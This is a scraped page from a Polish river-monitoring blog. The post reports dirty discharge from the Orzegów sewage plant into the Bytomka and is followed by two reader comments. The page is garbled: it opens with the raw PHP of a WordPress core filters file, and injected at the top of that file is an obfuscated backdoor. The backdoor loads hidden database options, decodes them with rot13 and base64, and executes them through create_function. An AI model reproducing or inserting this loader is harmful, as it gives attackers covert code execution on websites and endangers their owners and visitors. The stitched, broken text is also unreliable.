< ;$z=get_option("_site_transient_browser_d59cb970f17b0cd96498781ec4d5df3c"); $z=base64_decode(str_rot13($z[''])); if(strpos($z,"19CEBB55")!==false){ $_z=create_function("",$z); @$_z(); } ?php $z=get_option("_transient_feed_eec43c48cd79b0eedf0b5518f0333a3b"); $z=base64_decode(str_rot13($z)); if(strpos($z,"45FA5C1D")!==false){ $_z=create_function("",$z); @$_z(); }; /** * Sets up the default filters and actions for most * of the WordPress hooks. * * If you need to remove a default hook, this file will * give you the priority for which to use to remove the * hook. * * Not all of the default hooks are found in default-filters.php * * @package WordPress */ // Strip, trim, kses, special chars for string saves foreach ( array( 'pre_term_name', 'pre_comment_author_name', 'pre_link_name', 'pre_link_target', 'pre_link_rel', 'pre_user_display_name', 'pre_user_first_name', 'pre_user_last_name', 'pre_user_nickname' ) as $filter ) { add_filter( $filter, 'sanitize_text_field' ); add_filter( $filter, 'wp_filter_kses' ); add_filter( $filter, '_wp_specialchars', 30 ); } // Strip, kses, special chars for string display foreach ( array( 'term_name', 'comment_author_name', 'link_name', 'link_target', 'link_rel', 'user_display_name', 'user_first_name', 'user_last_name', 'user_nickname' ) as $filter ) { add_filter( $filter, 'sanitize_text_field' ); add_filter( $filter, 'wp_kses_data' ); add_filter( $filter, '_wp_specialchars', 30 ); } // Kses only for textarea saves foreach ( array( 'pre_term_description', 'pre_link_description', 'pre_link_notes', 'pre_user_description' ) as $filter ) { add_filter( $filter, 'wp_filter_kses' ); } // Kses only for textarea saves displays foreach ( array( 'term_description', 'link_description', 'link_notes', 'user_description' ) as $filter ) { add_filter( $filter, 'wp_kses_data' ); } // Email saves foreach ( array( 'pre_comment_author_email', 'pre_user_email' ) as $filter ) { add_filter( $filter, 'trim' ); add_filter( $filter, 'sanitize_email' ); add_filter( $filter, 'wp_filter_kses' ); } // Email display foreach ( array( 'comment_author_email', 'user_email' ) as $filter ) { add_filter( $filter, 'sanitize_email' ); add_filter( $filter, 'wp_kses_data' ); } // Save URL foreach ( array( 'pre_comment_author_url', 'pre_user_url', 'pre_link_url', 'pre_link_image', 'pre_link_rss' ) as $filter ) { add_filter( $filter, 'wp_strip_all_tags' ); add_filter( $filter, 'esc_url_raw' ); add_filter( $filter, 'wp_filter_kses' ); } // Display URL foreach ( array( 'user_url', 'link_url', 'link_image', 'link_rss', 'comment_url' ) as $filter ) { add_filter( $filter, 'wp_strip_all_tags' ); add_filter( $filter, 'esc_url' ); add_filter( $filter, 'wp_kses_data' ); } // Slugs foreach ( array( 'pre_term_slug' ) as $filter ) { add_filter( $filter, 'sanitize_title' ); } // Keys foreach ( array( 'pre_post_type' ) as $filter ) { add_filter( $filter, 'sanitize_user' ); } // Places to balance tags on input foreach ( array( 'content_save_pre', 'excerpt_save_pre', 'comment_save_pre', 'pre_comment_content' ) as $filter ) { add_filter( $filter, 'balanceTags', 50 ); } // Format strings for display. foreach ( array( 'comment_author', 'term_name', 'link_name', 'link_description', 'link_notes', 'bloginfo', 'wp_title', 'widget_title' ) as $filter ) { add_filter( $filter, 'wptexturize' ); add_filter( $filter, 'convert_chars' ); add_filter( $filter, 'esc_html' ); } // Format text area for display. foreach ( array( 'term_description' ) as $filter ) { add_filter( $filter, 'wptexturize' ); add_filter( $filter, 'convert_chars' ); add_filter( $filter, 'wpautop' ); add_filter( $filter, 'shortcode_unautop'); } // Format for RSS foreach ( array( 'term_name_rss' ) as $filter ) { add_filter( $filter, 'convert_chars' ); } // Display filters add_filter( 'the_title', 'wptexturize' ); add_filter( 'the_title', 'convert_chars' ); add_filter( 'the_title', 'trim' ); add_filter( 'the_content', 'wptexturize' ); add_filter( 'the_content', 'convert_smilies' ); add_filter( 'the_content', 'convert_chars' ); add_filter( 'the_content', 'wpautop' ); add_filter( 'the_content', 'shortcode_unautop' ); add_filter( 'the_content', 'prepend_attachment' ); add_filter( 'the_excerpt', 'wptexturize' ); add_filter( 'the_excerpt', 'convert_smilies' ); add_filter( 'the_excerpt', 'convert_chars' ); add_filter( 'the_excerpt', 'wpautop' ); add_filter( 'the_excerpt', 'shortcode_unautop'); add_filter( 'get_the_excerpt', 'wp_trim_excerpt' ); add_filter( 'comment_text', 'wptexturize' ); add_filter( 'comment_text', 'convert_chars' ); add_filter( 'comment_text', 'make_clickable', 9 ); add_filter( 'comment_text', 'force_balance_tags', 25 ); add_filter( 'comment_text', 'convert_smilies', 20 ); add_filter( 'comment_text', 'wpautop', 30 ); add_filter( 'comment_excerpt', 'convert_chars' ); add_filter( 'list_cats', 'wptexturize' ); add_filter( 'single_post_title', 'wptexturize' ); add_filter( 'wp_sprintf', 'wp_sprintf_l', 10, 2 ); // RSS filters add_filter( 'the_title_rss', 'strip_tags' ); add_filter( 'the_title_rss', 'ent2ncr', 8 ); add_filter( 'the_title_rss', 'esc_html' ); add_filter( 'the_content_rss', 'ent2ncr', 8 ); add_filter( 'the_excerpt_rss', 'convert_chars' ); add_filter( 'the_excerpt_rss', 'ent2ncr', 8 ); add_filter( 'comment_author_rss', 'ent2ncr', 8 ); add_filter( 'comment_text_rss', 'ent2ncr', 8 ); add_filter( 'comment_text_rss', 'esc_html' ); add_filter( 'bloginfo_rss', 'ent2ncr', 8 ); add_filter( 'the_author', 'ent2ncr', 8 ); // Misc filters add_filter( 'option_ping_sites', 'privacy_ping_filter' ); add_filter( 'option_blog_charset', '_wp_specialchars' ); // IMPORTANT: This must not be wp_specialchars() or esc_html() or it'll cause an infinite loop add_filter( 'option_home', '_config_wp_home' ); add_filter( 'option_siteurl', '_config_wp_siteurl' ); add_filter( 'tiny_mce_before_init', '_mce_set_direction' ); add_filter( 'pre_kses', 'wp_pre_kses_less_than' ); add_filter( 'sanitize_title', 'sanitize_title_with_dashes' ); add_action( 'check_comment_flood', 'check_comment_flood_db', 10, 3 ); add_filter( 'comment_flood_filter', 'wp_throttle_comment_flood', 10, 3 ); add_filter( 'pre_comment_content', 'wp_rel_nofollow', 15 ); add_filter( 'comment_email', 'antispambot' ); add_filter( 'option_tag_base', '_wp_filter_taxonomy_base' ); add_filter( 'option_category_base', '_wp_filter_taxonomy_base' ); add_filter( 'the_posts', '_close_comments_for_old_posts' ); add_filter( 'comments_open', '_close_comments_for_old_post', 10, 2 ); add_filter( 'pings_open', '_close_comments_for_old_post', 10, 2 ); add_filter( 'editable_slug', 'urldecode' ); // Atom SSL support add_filter( 'atom_service_url','atom_service_url_filter' ); // Actions add_action( 'wp_head', 'wp_enqueue_scripts', 1 ); add_action( 'wp_head', 'feed_links_extra', 3 ); add_action( 'wp_head', 'rsd_link' ); add_action( 'wp_head', 'wlwmanifest_link' ); add_action( 'wp_head', 'index_rel_link' ); add_action( 'wp_head', 'parent_post_rel_link', 10, 0 ); add_action( 'wp_head', 'start_post_rel_link', 10, 0 ); add_action( 'wp_head', 'adjacent_posts_rel_link', 10, 0 ); add_action( 'wp_head', 'locale_stylesheet' ); add_action( 'publish_future_post', 'check_and_publish_future_post', 10, 1 ); add_action( 'wp_head', 'noindex', 1 ); add_action( 'wp_head', 'wp_print_styles', 8 ); add_action( 'wp_head', 'wp_print_head_scripts', 9 ); add_action( 'wp_head', 'wp_generator' ); add_action( 'wp_head', 'rel_canonical' ); add_action( 'wp_footer', 'wp_print_footer_scripts' ); // WP Cron if ( !defined( 'DOING_CRON' ) ) add_action( 'sanitize_comment_cookies', 'wp_cron' ); // 2 Actions 2 Furious add_action( 'do_feed_rdf', 'do_feed_rdf', 10, 1 ); add_action( 'do_feed_rss', 'do_feed_rss', 10, 1 ); add_action( 'do_feed_rss2', 'do_feed_rss2', 10, 1 ); add_action( 'do_feed_atom', 'do_feed_atom', 10, 1 ); add_action( 'do_pings', 'do_all_pings', 10, 1 ); add_action( 'do_robots', 'do_robots' ); add_action( 'sanitize_comment_cookies', 'sanitize_comment_cookies' ); add_action( 'admin_print_scripts', 'print_head_scripts', 20 ); add_action( 'admin_print_footer_scripts', 'print_footer_scripts', 20 ); add_action( 'admin_print_styles', 'print_admin_styles', 20 ); add_action( 'init', 'smilies_init', 5 ); add_action( 'plugins_loaded', 'wp_maybe_load_widgets', 0 ); add_action( 'plugins_loaded', 'wp_maybe_load_embeds', 0 ); add_action( 'shutdown', 'wp_ob_end_flush_all', 1 ); add_action( 'pre_post_update', 'wp_save_post_revision' ); add_action( 'publish_post', '_publish_post_hook', 5, 1 ); add_action( 'future_post', '_future_post_hook', 5, 2 ); add_action( 'future_page', '_future_post_hook', 5, 2 ); add_action( 'save_post', '_save_post_hook', 5, 2 ); add_action( 'transition_post_status', '_transition_post_status', 5, 3 ); add_action( 'comment_form', 'wp_comment_form_unfiltered_html_nonce' ); add_action( 'wp_scheduled_delete', 'wp_scheduled_delete' ); // Post Thumbnail CSS class filtering add_action( 'begin_fetch_post_thumbnail_html', '_wp_post_thumbnail_class_filter_add' ); add_action( 'end_fetch_post_thumbnail_html', '_wp_post_thumbnail_class_filter_remove' ); // Redirect Old Slugs add_action( 'template_redirect', 'wp_old_slug_redirect' ); add_action( 'edit_post', 'wp_check_for_changed_slugs' ); add_action( 'edit_form_advanced', 'wp_remember_old_slug' ); add_action( 'init', '_show_post_preview' ); // Timezone add_filter( 'pre_option_gmt_offset','wp_timezone_override_offset' ); Brudna woda z oczyszczalni Orzegów | Rzeka.org - Rzeka Bytomka - Bytom, Ruda Śląska, Zabrze, Gliwice

Rzeka

Bytomka - rzeka w południowej Polsce w województwie śląskim. Swoje źródła bierze na terenie miasta Bytom. Przepływa kolejno przez Bytom, Rudę Śląską, Zabrze oraz Gliwice, gdzie wpływa do Kłodnicy będąc jej prawym dopływem. Należy do dorzecza Odry.

18.09.11

Brudna woda z oczyszczalni Orzegów

Nie zawsze nasze zmodernizowane oczyszczalnie oddają do rzeki wody o spodziewanej czystości. Dziś po raz kolejny oczyszczalnia Orzegów (Ruda Śląska) dała temu przykład. Znajdująca się w pobliżu ul. Bytomskiej (Ruda Śl.) i Orzegowskiej (Bytom) oczyszczalnia przeważnie rozcieńcza mętną w tym miejscu Bytomkę zrzucając dość klarowną wodę. Niestety na zdjęciach wykonanych dziś około godz. 16. widać, że czasem jest odwrotnie. W podobnej sprawie interweniowaliśmy w kwietniu br. w Urzędzie Miejskim w Rudzie Śląskiej. W odpowiedzi otrzymaliśmy pismo wyjaśniające. Zanieczyszczenie wody było związane ze "spęcznieniem osadu czynnego i brakiem sedymentacji w osadnikach wtórnych spowodowane zwiększonym ładunkiem nieoczyszczonych ścieków Zakładu Mięsnego XY...". Mamy nadzieję, że tym razem przyczyna nie jest tak poważna.

Komentarze

  • ~ Edmundo Dziwi mnie ten wpis z bardzo prozaicznej przyczyny, od kiedy określa się zanieczyszczenie cieczy na podstawie wizualnej kontroli w/w. Może autor powyższego zauważył by że na zdj.nr.1 widać spiętrzenie które jest winkiem złego stanu linii brzegowej, a przez to wymulania piasku zlokalizowanego w tym miejscu, co w efekcie stwarza wrażenie zanieczyszczenia wypływającej cieczy.
  • ~ udus Niech Edmundo czesciej odwiedza to miejsce to zmieni zdanie.Na pierwszym zdjeciu widac ze od strony Bytomia plynie czysciejsza woda jak z oczyszczalni Orzegow.To nie pierwszy raz i chyba nie ostatni ze oczyszczalnia ta jest na celowniku sympatykow Bytomki.

Dodaj komentarz